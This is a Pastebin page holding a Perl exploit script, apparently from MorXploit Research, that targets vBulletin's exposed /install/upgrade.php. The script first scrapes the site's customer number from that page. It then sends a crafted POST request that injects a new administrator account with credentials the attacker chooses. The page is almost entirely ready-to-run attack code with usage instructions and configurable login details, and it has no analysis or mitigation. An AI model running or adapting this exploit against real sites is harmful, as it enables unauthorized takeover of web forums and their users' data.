Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- use strict;
- use IO::Socket;
- if(!defined($ARGV[0])) {
- system ('clear');
- print "\n";
- print "===================================================\n";
- print "--- vbulletin admin injection exploit\n";
- print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
- print "--- MorXploit Research www.MorXploit.com\n";
- print "===================================================\n";
- print "--- Usage: perl $0 target\n\n";
- exit; }
- my $site = $ARGV[0];
- ##### Change these as needed #####
- my $user = "MorXploit";
- my $passwd = "m0rxpl017";
- my $email = "dev%40null.com";
- my $path = "/install/upgrade.php";
- ##################################
- my $accept = "Accept: */*";
- my $ct = "application/x-www-form-urlencoded";
- my $port = "80";
- system ('clear');
- print "\n";
- print "===================================================\n";
- print "--- vbulletin admin injection exploit\n";
- print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
- print "--- MorXploit Research www.MorXploit.com\n";
- print "===================================================\n";
- my $sock = new IO::Socket::INET ( PeerAddr => "$site",PeerPort => "$port",Proto => "tcp"); die "\n[-] Can't creat socket: $!\n" unless $sock;
- print "[*] Trying to get customer number ... hold on!\n";
- print $sock "GET $path HTTP/1.1\n";
- print $sock "Host: $site\n";
- print $sock "$accept\n";
- print $sock "Content-Type: $ct\n";
- print $sock "Connection: Close\n\n";
- my $gotcn;
- while(my $cn = <$sock>) {
- if ($cn =~ /CUSTNUMBER = \"(.*?)\"/){
- $gotcn = $1;
- }
- }
- if (!defined $gotcn) {
- print "[-] Failed to get customer number! Nulled? Going to try anyway!\n";
- }
- else {
- print "[+] Got $gotcn!\n";
- }
- my $xploit = "ajax=1&version=install&checktable=false&firstrun=false&step=7&startat=0
- &only=false&customerid=$gotcn&options[skiptemplatemerge]=0&response=yes&
- htmlsubmit=1&htmldata[username]=$user&htmldata[password]=$passwd&htmldat
- a[confirmpassword]=$passwd&htmldata[email]=$email";
- my $cl = length($xploit);
- my $content = "Content-Length: $cl";
- my $sock2 = new IO::Socket::INET ( PeerAddr => "$site",PeerPort => "$port",Proto => "tcp"); die "\n[-] Can't creat socket: $!\n" unless $sock;
- print "[*] Trying to MorXploit $site ... hold on!\n";
- print $sock2 "POST $path HTTP/1.1\n";
- print $sock2 "Host: $site\n";
- print $sock2 "$accept\n";
- print $sock2 "Cookie: bbcustomerid=$gotcn\n";
- print $sock2 "Content-Length: $cl\n";
- print $sock2 "Content-Type: $ct\n";
- print $sock2 "Connection: Close\n\n";
- print $sock2 "$xploit\n\n";
- while(my $result = <$sock2>){
- if ($result =~ /Administrator account created/) {
- print "[+] Admin account successfully injected!\n";
- print "[+] Admin: $user\n";
- print "[+] Pass: $passwd\n";
- exit;
- }
- }
- print "[-] Failed, something went wrong\n";
- exit;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement